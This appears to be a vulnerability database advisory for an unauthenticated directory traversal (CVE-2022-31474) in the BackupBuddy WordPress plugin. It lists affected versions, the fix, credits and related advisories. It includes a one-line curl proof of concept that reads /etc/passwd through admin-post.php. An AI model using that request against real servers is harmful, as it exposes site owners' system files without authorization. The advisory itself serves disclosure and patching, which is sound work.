BackupBuddy < 8.7.5 – Unauthenticated Arbitrary File Access | CVE 2022-31474 | Plugin Vulnerabilities

Description

The plugin is affected by a Directory Traversal attack, allowing unauthenticated attackers to access arbitrary files on the web server, starting in version 8.5.8.0.

Proof of Concept

Install BackupBuddy v8.5.8.0 through v8.7.4.1.

curl 'https://example.com/wp-admin/admin-post.php?local-download=../../../etc/passwd&local-destination-id=0' (assuming your local path is set to something like /var/www/html/).

Affects Plugins

Fixed in 8.7.5

References

CVE

URL

https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy/

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Lew Ayotte & Timothy Jacobs

Submitter

iThemes

Submitter website

https://ithemes.com/

Submitter twitter

Verified

Yes

WPVDB ID

435c9614-638d-439d-8ca2-2653d8628185

Timeline

Publicly Published

2022-09-06 (about 1 years ago)

Added

2022-09-07 (about 1 years ago)

Last Updated

2022-09-07 (about 1 years ago)

Other

Published

Title

Published

2022-04-28

Title

All-in-One WP Migration < 7.59 - Admin+ File Deletion on Windows Hosts via Path Traversal

Published

2012-01-16

Title

myEASYbackup <= 1.0.8.1 - Directory Traversal

Published

2022-11-29

Title

Simple:Press < 6.8.1 - Admin+ Arbitrary File Update

Published

2022-05-16

Title

User Meta < 2.4.4 - Subscriber+ Local File Enumeration via Path Traversal

Published

2017-10-20

Title

Multiple Plugins - jQueryFileTree - Unauthenticated Path Traversal